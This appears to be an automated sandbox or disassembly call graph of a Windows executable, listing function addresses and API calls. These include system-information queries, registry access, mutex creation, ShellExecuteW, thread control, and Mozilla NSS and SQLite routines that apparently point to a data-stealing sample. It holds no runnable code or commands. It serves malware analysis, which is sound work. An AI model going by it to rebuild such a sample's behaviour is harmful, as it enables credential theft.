68130 405438 68111->68130 68279 406099 GetProcessHeap HeapAlloc 68115->68279 68116->68098 68278 406099 GetProcessHeap HeapAlloc 68116->68278 68269 406099 GetProcessHeap HeapAlloc 68118->68269 68132 405163 68119->68132 68133 40513b 68119->68133 68296 41313a 28 API calls 68124->68296 68273 406099 GetProcessHeap HeapAlloc 68125->68273 68126->68098 68272 406099 GetProcessHeap HeapAlloc 68126->68272 68129->68098 68287 406099 GetProcessHeap HeapAlloc 68129->68287 68288 406099 GetProcessHeap HeapAlloc 68130->68288 68268 406099 GetProcessHeap HeapAlloc 68132->68268 68133->68098 68267 406099 GetProcessHeap HeapAlloc 68133->68267 68134 405628 68142 40315e 2 API calls 68134->68142 68135 40567a 68144 4030fe 2 API calls 68135->68144 68138 405555 68138->68098 68149 405634 68142->68149 68151 405678 68144->68151 68146 405215 68146->68098 68274 403da0 VirtualAlloc 68146->68274 68150 402f87 8 API calls 68149->68150 68154 405650 68150->68154 68151->68152 68155 4030fe 2 API calls 68151->68155 68152->68021 68156 402fce 2 API calls 68154->68156 68155->68152 68157 40565c 68156->68157 68158 40507e 686 API calls 68157->68158 68159 405668 68158->68159 68160 403148 2 API calls 68159->68160 68161 405670 68160->68161 68162 403148 2 API calls 68161->68162 68162->68151 68165 404cea 68164->68165 68250 404d34 68164->68250 68166 404e44 68165->68166 68167 404cf6 68165->68167 68168 404ee7 68166->68168 68169 404e4d 68166->68169 68170 404e39 68167->68170 68171 404cfc 68167->68171 68173 404f4b 68168->68173 68174 404eec 68168->68174 68175 404ee0 68169->68175 68176 404e53 68169->68176 68395 40290e 41 API calls 68170->68395 68177 404d05 68171->68177 68178 404daf 68171->68178 68409 4027c1 42 API calls 68173->68409 68182 404f42 68174->68182 68183 404ef2 68174->68183 68402 402aa3 24 API calls 68175->68402 68184 404e58 68176->68184 68185 404ebf 68176->68185 68187 404da3 68177->68187 68188 404d0b 68177->68188 68180 404e01 68178->68180 68181 404db4 68178->68181 68179 404e34 68179->68250 68192 404e06 68180->68192 68193 404e2d 68180->68193 68190 404f67 68181->68190 68191 404dba 68181->68191 68408 40278b ShellExecuteW lstrlenW lstrcpyW VirtualFree VirtualAlloc 68182->68408 68194 404ef8 68183->68194 68195 404f3b 68183->68195 68196 404eb0 68184->68196 68197 404e5a 68184->68197 68185->68250 68401 4027ff 416 API calls 68185->68401 68390 402b36 36 API calls 68187->68390 68199 404d10 68188->68199 68200 404d6a 68188->68200 68410 402a9c 18 API calls 68190->68410 68203 404df7 68191->68203 68204 404dbf 68191->68204 68211 404e22 68192->68211 68212 404e0c 68192->68212 68394 402a0a 23 API calls 68193->68394 68205 404efd 68194->68205 68206 404f2e 68194->68206 68407 402774 24 API calls 68195->68407 68400 40d1c8 TerminateThread CloseHandle shutdown EnterCriticalSection LeaveCriticalSection 68196->68400 68207 404ea3 68197->68207 68208 404e5f 68197->68208 68216 404d12 68199->68216 68217 404d5e 68199->68217 68209 404d97 68200->68209 68210 404d6f 68200->68210 68393 402aee 51 API calls 68203->68393 68221 404dc5 68204->68221 68222 404de9 68204->68222 68223 404f20 68205->68223 68224 404f03 68205->68224 68406 40cf1b GetProcessHeap RtlAllocateHeap CreateThread 68206->68406 68399 40906f 419 API calls 68207->68399 68225 404e65 68208->68225 68226 404e98 68208->68226 68389 402c31 30 API calls 68209->68389 68231 404d75 68210->68231 68232 404d8b 68210->68232 68356 415a43 68211->68356 68212->68250 68348 40c09d 68212->68348 68218 404d17 68216->68218 68219 404d4d 68216->68219 68386 402d20 54 API calls 68217->68386 68236 404d43 68218->68236 68237 404d1d 68218->68237 68304 402e27 68219->68304 68238 404dcb 68221->68238 68239 404ddf 68221->68239 68392 414345 26 API calls 68222->68392 68405 4026bb 416 API calls 68223->68405 68240 404f17 68224->68240 68241 404f08 68224->68241 68242 404e86 68225->68242 68243 404e6b 68225->68243 68398 409029 416 API calls 68226->68398 68231->68250 68387 402b4b 53 API calls 68231->68387 68388 402bdc 52 API calls 68232->68388 68385 402dc9 43 API calls 68236->68385 68251 404d23 68237->68251 68252 404d39 68237->68252 68238->68250 68345 402ac6 68238->68345 68391 41430e WaitForSingleObject ReleaseMutex CoUninitialize 68239->68391 68404 40264d 32 API calls 68240->68404 68241->68250 68403 402cbb 35 API calls 68241->68403 68397 40e29a 442 API calls 68242->68397 68243->68250 68396 402895 418 API calls 68243->68396 68250->68134 68250->68135 68251->68250 68383 402d2f 35 API calls 68251->68383 68384 402d82 36 API calls 68252->68384 68264 403107 68263->68264 68265 40310c 68263->68265 69331 406034 GetProcessHeap RtlFreeHeap 68264->69331 68265->68033 68267->68098 68268->68098 68269->68098 68270->68098 68271->68098 68272->68098 68273->68146 68274->68098 68275->68098 68276->68098 68277->68098 68278->68098 68279->68098 68280->68098 68281->68098 68282->68098 68283->68094 68284->68098 68285->68098 68286->68098 68287->68098 68288->68098 68289->68098 68290->68098 68291->68098 68292->68088 68293->68098 68294->68098 68295->68098 68296->68138 68297->68138 68298->68098 68299->68098 68300->68098 68301->68098 68302->68056 68303->68098 68411 410e5e 68304->68411 68309 4134a2 6 API calls 68310 402e6d 68309->68310 68311 4036f7 4 API calls 68310->68311 68312 402e93 68311->68312 68313 4036f7 4 API calls 68312->68313 68314 402e9c 68313->68314 68430 410f3e GlobalMemoryStatusEx 68314->68430 68316 402ea1 68317 4036f7 4 API calls 68316->68317 68318 402eb2 68317->68318 68431 41119d GetComputerNameW 68318->68431 68323 41111b 4 API calls 68324 402ec5 68323->68324 68437 410f61 LoadLibraryA 68324->68437 68346 405044 24 API calls 68345->68346 68347 402adb 68346->68347 68347->68250 68349 40c0b0 68348->68349 68350 40c0aa 68348->68350 68550 406045 GetProcessHeap RtlAllocateHeap 68349->68550 68552 401ad0 VirtualFree 68350->68552 68353 40c0c9 68551 401f6d CreateThread 68353->68551 68355 40c0ec 68355->68250 68357 40315e 2 API calls 68356->68357 68358 415a5a 68357->68358 68359 415c47 68358->68359 68360 415a66 68358->68360 68365 4030cc 6 API calls 68359->68365 68361 415c05 68360->68361 68362 415a6f 68360->68362 68370 4030cc 6 API calls 68361->68370 68363 415a78 68362->68363 68364 415bbc 68362->68364 68366 415a81 68363->68366 68367 415b73 68363->68367 68372 4030cc 6 API calls 68364->68372 68377 415abe 68365->68377 68368 415b2a 68366->68368 68369 415a8a 68366->68369 68376 4030cc 6 API calls 68367->68376 68378 4030cc 6 API calls 68368->68378 68371 415ae1 68369->68371 68380 415a8f 68369->68380 68370->68377 68381 4030cc 6 API calls 68371->68381 68372->68377 68373 415c8d 68375 403148 2 API calls 68373->68375 68374 415c87 SetEvent 68374->68373 68379 415c95 68375->68379 68376->68377 68377->68373 68377->68374 68378->68377 68379->68250 68380->68373 68382 4030cc 6 API calls 68380->68382 68381->68377 68382->68377 68383->68250 68384->68250 68385->68250 68386->68250 68387->68250 68388->68250 68389->68250 68390->68250 68391->68250 68392->68250 68393->68250 68394->68179 68395->68179 68396->68250 68397->68250 68398->68250 68399->68179 68400->68250 68401->68250 68402->68250 68403->68250 68404->68250 68405->68250 68406->68179 69330 40c808 55 API calls 68406->69330 68407->68250 68408->68179 68409->68250 68413 410e9c 68411->68413 68498 401085 GetProcessHeap RtlAllocateHeap 68413->68498 68414 410f03 68415 4034d1 4 API calls 68414->68415 68416 410f21 68415->68416 68417 4031af 10 API calls 68416->68417 68418 410f28 68417->68418 68499 405feb VirtualFree 68418->68499 68420 410f30 68500 401099 GetProcessHeap RtlFreeHeap 68420->68500 68422 402e3f 68423 410d2d CoInitializeSecurity CoInitialize 68422->68423 68424 410d55 CoCreateInstance 68423->68424 68426 410d96 68423->68426 68424->68426 68429 410d73 68424->68429 68425 4036f7 4 API calls 68427 402e47 GetModuleFileNameA 68425->68427 68426->68425 68427->68309 68428 410de9 VariantInit 68428->68429 68429->68426 68429->68427 68429->68428 68430->68316 68432 4036f7 4 API calls 68431->68432 68433 402eba 68432->68433 68434 411177 GetCurrentProcess 68433->68434 68501 4121dc GetModuleHandleA GetProcAddress 68434->68501 68438 410f83 GetProcAddress 68437->68438 68440 402ecb 68437->68440 68439 410f97 68438->68439 68438->68440 68439->68440 68441 4111d7 68440->68441 68442 411277 68441->68442 68443 4111fd 68441->68443 68446 402fce 2 API calls 68442->68446 68444 4036f7 4 API calls 68443->68444 68445 41120a RegOpenKeyExW 68444->68445 68503 405feb VirtualFree 68445->68503 68448 41128b 68446->68448 68449 403148 2 API calls 68448->68449 68451 411293 68449->68451 68450 41122d 68498->68414 68499->68420 68500->68422 68502 402ebf 68501->68502 68502->68323 68503->68450 68550->68353 68551->68355 68553 40b917 68551->68553 68552->68349 68630 415847 68553->68630 68556 40bbf0 68557 403148 2 API calls 68556->68557 68559 40bbf9 68557->68559 68558 40315e 2 API calls 68560 40b955 68558->68560 68667 409718 68560->68667 68565 40bbdb 68985 406034 GetProcessHeap RtlFreeHeap 68565->68985 68566 410c8a 5 API calls 68568 40b983 68566->68568 68570 410c8a 5 API calls 68568->68570 68569 40bbe8 68986 401f98 68569->68986 68572 40b98f 68570->68572 68699 40bc0d 68572->68699 68631 4159c8 68630->68631 68632 41585d 68630->68632 68637 405044 24 API calls 68631->68637 68642 4158c6 68631->68642 68633 415866 68632->68633 68634 415998 68632->68634 68635 415968 68633->68635 68636 41586f 68633->68636 68641 405044 24 API calls 68634->68641 68634->68642 68635->68642 68644 405044 24 API calls 68635->68644 68639 415878 68636->68639 68649 415938 68636->68649 68638 4159e3 68637->68638 69000 4112b2 WaitForSingleObject 68638->69000 68645 415881 68639->68645 68646 415908 68639->68646 68640 40315e 2 API calls 68647 40b93d 68640->68647 68648 4159b7 68641->68648 68642->68640 68650 415987 68644->68650 68651 4158d2 68645->68651 68652 415886 68645->68652 68646->68642 68656 405044 24 API calls 68646->68656 68647->68556 68647->68558 68999 4112b2 WaitForSingleObject 68648->68999 68649->68642 68654 405044 24 API calls 68649->68654 68998 4112b2 WaitForSingleObject 68650->68998 68651->68642 68658 405044 24 API calls 68651->68658 68652->68642 68652->68647 68663 405044 24 API calls 68652->68663 68657 415957 68654->68657 68659 41592a 68656->68659 68997 4112b2 WaitForSingleObject 68657->68997 68661 4158f4 68658->68661 68996 4112b2 WaitForSingleObject 68659->68996 68995 4112b2 WaitForSingleObject 68661->68995 68665 4158ba 68663->68665 68994 4112b2 WaitForSingleObject 68665->68994 68668 402fce 2 API calls 68667->68668 68669 409727 68668->68669 68670 403148 2 API calls 68669->68670 68671 40972f 68670->68671 68672 40973f 68671->68672 69001 411ef1 68672->69001 68675 409815 68675->68565 68675->68566 68678 411e88 lstrcmpA 68679 409775 68678->68679 68680 411e88 lstrcmpA 68679->68680 68681 409785 68680->68681 68682 411e88 lstrcmpA 68681->68682 68683 409795 68682->68683 68684 411e88 lstrcmpA 68683->68684 68685 4097a5 68684->68685 68686 411e88 lstrcmpA 68685->68686 68687 4097b5 68686->68687 68688 411e88 lstrcmpA 68687->68688 68689 4097c5 68688->68689 68690 411e88 lstrcmpA 68689->68690 68691 4097d5 68690->68691 68692 411e88 lstrcmpA 68691->68692 68693 4097e5 68692->68693 68694 411e88 lstrcmpA 68693->68694 68695 4097f5 68694->68695 68696 411e88 lstrcmpA 68695->68696 68700 410c8a 5 API calls 68699->68700 68701 40bc2e 68700->68701 68702 40357c 9 API calls 68701->68702 68703 40bc3c 68702->68703 68704 4035b9 21 API calls 68703->68704 68705 40bc47 68704->68705 68706 403447 5 API calls 68705->68706 68707 40bc50 68706->68707 69011 405feb VirtualFree 68707->69011 68709 40bc58 68710 40357c 9 API calls 68709->68710 68711 40bc66 68710->68711 68712 410c8a 5 API calls 68711->68712 68713 40bc71 68712->68713 68714 40357c 9 API calls 68713->68714 68715 40bc7a 68714->68715 68985->68569 68987 401fa0 TerminateThread CloseHandle 68986->68987 68988 401fb2 68986->68988 68987->68988 68988->68556 68994->68642 68995->68642 68996->68642 68997->68642 68998->68642 68999->68642 69000->68642 69002 411f07 69001->69002 69003 411f11 VirtualAlloc 69002->69003 69006 40974d 69002->69006 69004 411f2d 69003->69004 69003->69006 69005 411ce3 GetPEB lstrcmpA 69004->69005 69004->69006 69005->69006 69006->68675 69007 411e88 69006->69007 69008 411ea2 69007->69008 69009 409765 69008->69009 69010 411eb8 lstrcmpA 69008->69010 69009->68678 69010->69008 69010->69009 69011->68709 69331->68265 69333->67564 69334 6cd0b25a 69382 6cd14450 69334->69382 69339 6cd0b34f 69342 6cd0b2cb 69344 6cd0b2d9 69342->69344 69345 6cd1ca25 __cfltcvt PR_Free 69342->69345 69343 6cd1ca25 __cfltcvt PR_Free 69343->69342 69346 6cd0b2e7 69344->69346 69347 6cd1ca25 __cfltcvt PR_Free 69344->69347 69345->69344 69348 6cd0b2f5 69346->69348 69349 6cd1ca25 __cfltcvt PR_Free 69346->69349 69347->69346 69350 6cd0b303 69348->69350 69351 6cd1ca25 __cfltcvt PR_Free 69348->69351 69349->69348 69350->69339 69352 6cd0b319 69350->69352 69475 6cd146a8 PR_Lock PR_Unlock 69350->69475 69351->69350 69435 6cd048cc 69352->69435 69355 6cd0b338 69356 6cd0b476 69355->69356 69357 6cd0b358 69355->69357 69358 6cd0b349 69355->69358 69359 6cd0b481 69356->69359 69484 6cd02122 PR_GetEnvSecure PR_UnloadLibrary PR_GetEnvSecure PR_UnloadLibrary 69356->69484 69362 6cd0b462 69357->69362 69474 6cd1cb04 PR_SetError 69357->69474 69476 6cd14161 16 API calls _wcsftime 69358->69476 69485 6cd13d82 13 API calls _wcsftime 69359->69485 69364 6cd0b468 69362->69364 69365 6cd0b46f 69362->69365 69482 6cd13d50 13 API calls _wcsftime 69364->69482 69483 6cd13cf9 29 API calls _wcsftime 69365->69483 69369 6cd0b370 SECMOD_GetModuleSpecList 69371 6cd0b445 69369->69371 69376 6cd0b385 69369->69376 69370 6cd0b407 69370->69356 69370->69362 69371->69370 69481 6cd1cb04 PR_SetError 69371->69481 69373 6cd0b3d3 SECMOD_LoadModule 69373->69370 69373->69376 69374 6cd0b429 69480 6cd1cb04 PR_SetError 69374->69480 69376->69370 69376->69373 69376->69374 69378 6cd0b409 69376->69378 69477 6cd14161 16 API calls _wcsftime 69376->69477 69478 6cd14161 16 API calls _wcsftime 69378->69478 69380 6cd0b420 69479 6cd1cb04 PR_SetError 69380->69479 69383 6cd14459 69382->69383 69384 6cd0b27e 69382->69384 69486 6ccfee07 10 API calls __cftof 69383->69486 69386 6cd1e968 69384->69386 69487 6cd1ecf2 69386->69487 69388 6cd0b29a 69388->69339 69394 6cd0affc 69388->69394 69389 6cd1ca25 PR_Free __cfltcvt 69391 6cd1e976 __cftof 69389->69391 69390 6cd1e4b8 PR_Malloc PR_SetError isspace __cftof 69390->69391 69391->69388 69391->69389 69391->69390 69392 6cd1ecf2 __cftof isspace 69391->69392 69491 6cd1ecbc isspace __cftof 69391->69491 69392->69391 69493 6cd0c791 27 API calls 2 library calls 69394->69493 69396 6cd0b007 69433 6cd0b00c 69396->69433 69494 6cd1c8f4 5 API calls __cftof 69396->69494 69398 6cd0b035 69399 6cd0b04a 69398->69399 69495 6cd1c8f4 5 API calls __cftof 69398->69495 69400 6cd0b05f 69399->69400 69496 6cd1c8f4 5 API calls __cftof 69399->69496 69497 6cd1e71d 4 API calls 2 library calls 69400->69497 69404 6cd0b07a 69498 6cd1e71d 4 API calls 2 library calls 69404->69498 69406 6cd0b089 69499 6cd1e71d 4 API calls 2 library calls 69406->69499 69408 6cd0b098 69500 6cd1e667 PR_Malloc PR_SetError isspace __cftof _mbstowcs_s 69408->69500 69410 6cd0b0a6 69501 6cd1eb74 12 API calls 2 library calls 69410->69501 69412 6cd0b0b4 69413 6cd0b0c4 69412->69413 69415 6cd1ca25 __cfltcvt PR_Free 69412->69415 69502 6cd1ec75 5 API calls 2 library calls 69413->69502 69415->69413 69416 6cd0b0d5 69503 6cd1ec75 5 API calls 2 library calls 69416->69503 69418 6cd0b0e5 69504 6cd1e71d 4 API calls 2 library calls 69418->69504 69420 6cd0b0f9 69505 6cd1e71d 4 API calls 2 library calls 69420->69505 69422 6cd0b108 69423 6cd0b148 69422->69423 69506 6cd1e71d 4 API calls 2 library calls 69422->69506 69424 6cd0b16f 69423->69424 69508 6cd1e71d 4 API calls 2 library calls 69423->69508 69509 6cd1e667 PR_Malloc PR_SetError isspace __cftof _mbstowcs_s 69424->69509 69428 6cd0b12a 69507 6cd1e71d 4 API calls 2 library calls 69428->69507 69429 6cd0b191 69510 6cd1e7d8 atoi atoi __cftof 69429->69510 69432 6cd0b19d 69432->69433 69434 6cd1ca25 __cfltcvt PR_Free 69432->69434 69433->69342 69433->69343 69434->69433 69436 6cd04901 69435->69436 69440 6cd048fa _mbstowcs_s 69435->69440 69437 6cd04995 69436->69437 69438 6cd04913 69436->69438 69439 6cd0499e PR_LoadLibrary 69436->69439 69437->69439 69437->69440 69441 6cd04935 PR_FindSymbol 69438->69441 69442 6cd0491b PR_CallOnce 69438->69442 69439->69440 69443 6cd049b8 69439->69443 69440->69355 69441->69440 69448 6cd04967 69441->69448 69442->69440 69442->69441 69444 6cd049cd 69443->69444 69445 6cd049bd PR_FindSymbol 69443->69445 69447 6cd049d3 PR_FindSymbol 69444->69447 69451 6cd0497f 69444->69451 69445->69444 69447->69451 69450 6cd0496d PR_FindSymbol 69448->69450 69448->69451 69449 6cd049f2 69449->69440 69452 6cd04aed PR_UnloadLibrary 69449->69452 69450->69451 69451->69440 69451->69449 69453 6cd04ad0 PR_GetEnvSecure 69451->69453 69454 6cd04a1a PR_GetEnvSecure 69451->69454 69452->69440 69453->69440 69453->69449 69456 6cd04a32 69454->69456 69511 6cd04c38 69456->69511 69457 6cd04ab8 69457->69453 69459 6cd04aae 69548 6cd1cb04 PR_SetError 69459->69548 69461 6cd04b08 69461->69457 69470 6cd04c1e 69461->69470 69524 6cd1c6c7 69461->69524 69466 6cd04b95 69467 6cd1ca25 __cfltcvt PR_Free 69466->69467 69467->69457 69468 6cd04c11 69469 6cd1ca25 __cfltcvt PR_Free 69468->69469 69469->69470 69473 6cd04ba0 _wcsftime 69473->69468 69540 6cd12973 69473->69540 69549 6cd0209e 5 API calls __cftof 69473->69549 69474->69369 69475->69352 69476->69339 69477->69376 69478->69380 69479->69370 69480->69370 69481->69370 69482->69339 69483->69339 69484->69359 69485->69339 69486->69384 69490 6cd1ecfb 69487->69490 69488 6cd1ed0d 69488->69391 69490->69488 69492 6cd1e78a isspace 69490->69492 69491->69391 69492->69490 69493->69396 69494->69398 69495->69399 69496->69400 69497->69404 69498->69406 69499->69408 69500->69410 69501->69412 69502->69416 69503->69418 69504->69420 69505->69422 69506->69428 69507->69423 69508->69424 69509->69429 69510->69432 69514 6cd04c4a 69511->69514 69512 6cd04d1b 69554 6cd1cb04 PR_SetError 69512->69554 69514->69512 69516 6cd04ce3 69514->69516 69550 6cd14cb6 PR_Lock PR_Unlock PR_SetError __cfltcvt _wcsftime 69514->69550 69515 6cd04a77 69515->69453 69515->69457 69515->69459 69515->69461 69516->69512 69516->69515 69519 6cd04d22 __cfltcvt 69516->69519 69518 6cd04cb8 69518->69516 69551 6cd04d8f 64 API calls 2 library calls 69518->69551 69519->69515 69553 6cd1cb04 PR_SetError 69519->69553 69522 6cd04cc7 69522->69515 69552 6cd14161 16 API calls _wcsftime 69522->69552 69525 6cd1c774 PR_SetError 69524->69525 69526 6cd1c6e4 69524->69526 69529 6cd04b5b 69525->69529 69527 6cd1c6f1 PR_Lock 69526->69527 69528 6cd1c73b 69526->69528 69531 6cd1c713 69527->69531 69535 6cd1c70f PR_Unlock 69527->69535 69534 6cd1c74f 69528->69534 69556 6cd20945 malloc __cftof 69528->69556 69529->69457 69536 6cd1c68c 69529->69536 69531->69535 69555 6cd20945 malloc __cftof 69531->69555 69534->69525 69534->69529 69535->69534 69537 6cd1c6b3 PR_SetError 69536->69537 69538 6cd1c69d PR_Malloc 69536->69538 69539 6cd04b74 69537->69539 69538->69537 69538->69539 69539->69457 69539->69466 69539->69473 69541 6cd129b5 69540->69541 69542 6cd129ef strncmp 69541->69542 69547 6cd129bb _mbstowcs_s 69541->69547 69543 6cd12a23 69542->69543 69543->69547 69557 6cd12bac 69543->69557 69545 6cd12a41 69545->69547 69566 6cd0a7ff 69545->69566 69547->69473 69548->69457 69549->69473 69550->69518 69551->69522 69552->69516 69553->69515 69554->69515 69555->69535 69556->69534 69558 6cd12bc8 69557->69558 69559 6cd12bf6 __cfltcvt 69558->69559 69561 6cd12c0c __cfltcvt _wcsftime 69558->69561 69573 6cd1cb04 PR_SetError 69559->69573 69564 6cd12cf9 _wcsftime 69561->69564 69565 6cd12c02 _wcsftime _mbstowcs_s 69561->69565 69574 6cd1cb04 PR_SetError 69561->69574 69564->69565 69575 6cd122b8 PR_SetError __cfltcvt _wcsftime 69564->69575 69565->69545 69567 6cd0a813 69566->69567 69568 6cd0a87c __cfltcvt 69567->69568 69571 6cd0a831 __cfltcvt 69567->69571 69577 6cd1cb04 PR_SetError 69568->69577 69570 6cd0a860 69570->69547 69571->69570 69576 6cd1cb04 PR_SetError 69571->69576 69573->69565 69574->69564 69575->69565 69576->69570 69577->69570 69578 6cc91b23 69581 6cc8603e 69578->69581 69580 6cc91b2e 69582 6cc8607c 69581->69582 69584 6cc86052 69581->69584 69582->69584 69585 6cc82f06 69582->69585 69584->69580 69586 6cc82f43 69585->69586 69588 6cc82f1b 69585->69588 69589 6cca2bc4 69586->69589 69588->69584 69592 6cc8393c 69589->69592 69590 6cca2bda 69590->69588 69593 6cc83957 69592->69593 69594 6cc83947 69592->69594 69608 6cc669bc 69593->69608 69594->69590 69596 6cc83a25 69598 6cc839a2 69596->69598 69602 6cc83a32 69596->69602 69597 6cc83974 69597->69594 69597->69596 69597->69598 69599 6cc83a10 69597->69599 69598->69594 69621 6cc88367 sqlite3_free sqlite3_free memset 69598->69621 69612 6cc8b73f 69599->69612 69600 6cc83a59 memset 69600->69594 69602->69600 69603 6cc83a49 69602->69603 69619 6cc90f35 6 API calls 69602->69619 69620 6cc6c194 6 API calls 69603->69620 69606 6cc83a52 69606->69600 69609 6cc669d7 69608->69609 69611 6cc669e7 69609->69611 69622 6cc8a272 69609->69622 69611->69597 69613 6cc8b7ce 69612->69613 69614 6cc8b75e 69612->69614 69657 6cca250d 69613->69657 69614->69613 69616 6cc8b77d 69614->69616 69617 6cc8b7c1 69614->69617 69618 6cca250d 17 API calls 69616->69618 69617->69598 69618->69617 69619->69603 69620->69606 69621->69594 69623 6cc8a282 69622->69623 69624 6cc8a2a2 69623->69624 69626 6cc8a2b7 69623->69626 69638 6cc8a545 malloc sqlite3_free sqlite3_mutex_enter sqlite3_mutex_leave memset 69623->69638 69624->69611 69631 6cc8a2fe 69626->69631 69639 6cc8a508 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 69626->69639 69629 6cc8a2e4 69629->69624 69640 6cc8a3fc sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 69629->69640 69632 6cc8a1a8 69631->69632 69633 6cc8a1b8 69632->69633 69637 6cc8a1da 69632->69637 69634 6cc8a1c3 69633->69634 69641 6cc8a427 69633->69641 69634->69637 69646 6cc8a0ee 7 API calls 69634->69646 69637->69624 69638->69626 69639->69629 69640->69631 69642 6cc8a433 69641->69642 69643 6cc8a437 69641->69643 69642->69634 69645 6cc8a441 69643->69645 69647 6cca1b25 69643->69647 69645->69634 69646->69637 69648 6cca1b34 69647->69648 69652 6cca1b77 69647->69652 69649 6cca1b4d sqlite3_mutex_enter 69648->69649 69648->69652 69653 6cc85af1 69649->69653 69651 6cca1b64 sqlite3_mutex_leave 69651->69652 69652->69645 69655 6cc85b00 69653->69655 69654 6cc85b5c 69654->69651 69656 6cc65824 malloc 69655->69656 69656->69654 69660 6cc6475d 69657->69660 69663 6cc64778 69660->69663 69668 6cc647ee 69660->69668 69661 6cc64818 ReadFile 69664 6cc64876 69661->69664 69661->69668 69662 6cc647b3 memcpy 69662->69668 69663->69662 69665 6cc64798 memcpy 69663->69665 69663->69668 69666 6cc647aa 69664->69666 69667 6cc64890 memset 69664->69667 69665->69666 69666->69617 69667->69666 69668->69661 69668->69664 69669 6cc64850 69668->69669 69671 6ccc257f 13 API calls _mbstowcs_s 69669->69671 69671->69666 69672 40124c 69675 40910d 69672->69675 69686 4018c7 69675->69686 69678 4113ed CreateMutexA 69679 409148 LoadLibraryW 69678->69679 69680 411e88 lstrcmpA 69679->69680 69681 409178 69680->69681 69682 411e88 lstrcmpA 69681->69682 69683 409189 69682->69683 69684 411e88 lstrcmpA 69683->69684 69685 401251 69684->69685 69689 406099 GetProcessHeap HeapAlloc 69686->69689 69688 4018f0 InitializeCriticalSection 69688->69678 69689->69688 69690 40122e 69693 415c9b 69690->69693 69778 4025d2 69693->69778 69696 4025d2 VirtualAlloc 69697 415cb8 69696->69697 69698 4025d2 VirtualAlloc 69697->69698 69699 415cc2 69698->69699 69700 4025d2 VirtualAlloc 69699->69700 69701 415ccc 69700->69701 69702 4025d2 VirtualAlloc 69701->69702 69703 415cd6 69702->69703 69704 4025d2 VirtualAlloc 69703->69704 69705 415ce0 69704->69705 69706 4025d2 VirtualAlloc 69705->69706 69707 415cea 69706->69707 69781 401085 GetProcessHeap RtlAllocateHeap 69707->69781 69709 415d16 69782 401085 GetProcessHeap RtlAllocateHeap 69709->69782 69711 415d1f 69783 401085 GetProcessHeap RtlAllocateHeap 69711->69783 69713 415d28 69784 401085 GetProcessHeap RtlAllocateHeap 69713->69784 69715 415d31 69785 401085 GetProcessHeap RtlAllocateHeap 69715->69785 69717 415d3b 69786 401085 GetProcessHeap RtlAllocateHeap 69717->69786 69719 415d45 69787 401085 GetProcessHeap RtlAllocateHeap 69719->69787 69721 415d4f 69788 413363 69721->69788 69724 413363 2 API calls 69725 415d60 69724->69725 69726 413363 2 API calls 69725->69726 69727 415d67 69726->69727 69728 413363 2 API calls 69727->69728 69729 415d6f 69728->69729 69730 413363 2 API calls 69729->69730 69731 415d77 69730->69731 69732 413363 2 API calls 69731->69732 69733 415d7f 69732->69733 69734 413363 2 API calls 69733->69734 69735 415d87 69734->69735 69736 4034d1 4 API calls 69735->69736 69737 415d93 69736->69737 69792 4112c4 69737->69792 69739 415d9e 69795 405feb VirtualFree 69739->69795 69741 415da6 69742 4034d1 4 API calls 69741->69742 69743 415db0 69742->69743 69744 4112c4 5 API calls 69743->69744 69745 415dbb 69744->69745 69796 405feb VirtualFree 69745->69796 69747 415dc3 69748 4034d1 4 API calls 69747->69748 69749 415dcd 69748->69749 69750 4112c4 5 API calls 69749->69750 69751 415dd8 69750->69751 69797 405feb VirtualFree 69751->69797 69753 415de0 69754 4034d1 4 API calls 69753->69754 69755 415dec 69754->69755 69756 4112c4 5 API calls 69755->69756 69757 415df7 69756->69757 69798 405feb VirtualFree 69757->69798 69759 415dff 69760 4034d1 4 API calls 69759->69760 69761 415e0b 69760->69761 69762 4112c4 5 API calls 69761->69762 69763 415e16 69762->69763 69799 405feb VirtualFree 69763->69799 69765 415e1e 69766 4034d1 4 API calls 69765->69766 69767 415e2a 69766->69767 69768 4112c4 5 API calls 69767->69768 69769 415e35 69768->69769 69800 405feb VirtualFree 69769->69800 69771 415e3d 69772 4034d1 4 API calls 69771->69772 69773 415e49 69772->69773 69774 4112c4 5 API calls 69773->69774 69775 415e54 69774->69775 69801 405feb VirtualFree 69775->69801 69777 401233 69802 4112f0 69778->69802 69781->69709 69782->69711 69783->69713 69784->69715 69785->69717 69786->69719 69787->69721 69789 413369 69788->69789 69791 413386 69789->69791 69805 41338d Sleep GetTickCount 69789->69805 69791->69724 69793 403237 4 API calls 69792->69793 69794 4112d6 CreateEventA 69793->69794 69794->69739 69795->69741 69796->69747 69797->69753 69798->69759 69799->69765 69800->69771 69801->69777 69803 4032d5 VirtualAlloc 69802->69803 69804 4025e5 69803->69804 69804->69696 69805->69789 69806 6cc64077 69809 6cc871fa sqlite3_initialize 69806->69809 69810 6cc64089 69809->69810 69811 6cc8721e 69809->69811 69842 6cca1c46 69811->69842 69813 6cc872a8 69815 6cc872ab sqlite3_errcode 69813->69815 69814 6cc872cc sqlite3_mutex_enter 69822 6cc87378 69814->69822 69817 6cc872be sqlite3_close 69815->69817 69818 6cc875d2 69815->69818 69819 6cc875dd sqlite3_free 69817->69819 69818->69819 69819->69810 69820 6cc8729f sqlite3_free 69820->69813 69821 6cc8745f sqlite3_mutex_leave 69821->69815 69823 6cc87428 69822->69823 69824 6cc8746d 69822->69824 69828 6cc87459 69822->69828 69886 6cc96c51 memset memcpy memmove memcpy 69823->69886 69847 6cc92770 69824->69847 69827 6cc87450 sqlite3_free 69827->69828 69828->69821 69829 6cc87488 69829->69828 69887 6cc922e8 sqlite3_mutex_leave 69829->69887 69831 6cc874e2 69831->69828 69832 6cc8752d sqlite3_overload_function 69831->69832 69833 6cc8754d sqlite3_errcode 69832->69833 69834 6cc87544 69832->69834 69835 6cc87558 69833->69835 69836 6cc8756e 69833->69836 69834->69833 69888 6cc90666 7 API calls 69835->69888 69841 6cc8757e 69836->69841 69889 6cc9c259 18 API calls 69836->69889 69838 6cc8755e sqlite3_errcode 69838->69821 69838->69836 69890 6cc8ec85 malloc sqlite3_free sqlite3_mutex_enter sqlite3_mutex_leave 69841->69890 69843 6cca1b25 3 API calls 69842->69843 69844 6cca1c55 69843->69844 69845 6cc87277 69844->69845 69846 6cca1c5d memset 69844->69846 69845->69813 69845->69814 69845->69820 69846->69845 69848 6cc927b5 69847->69848 69849 6cca1c46 4 API calls 69848->69849 69855 6cc92815 69849->69855 69850 6cc92a19 69851 6cca1c46 4 API calls 69850->69851 69852 6cc92a22 69851->69852 69854 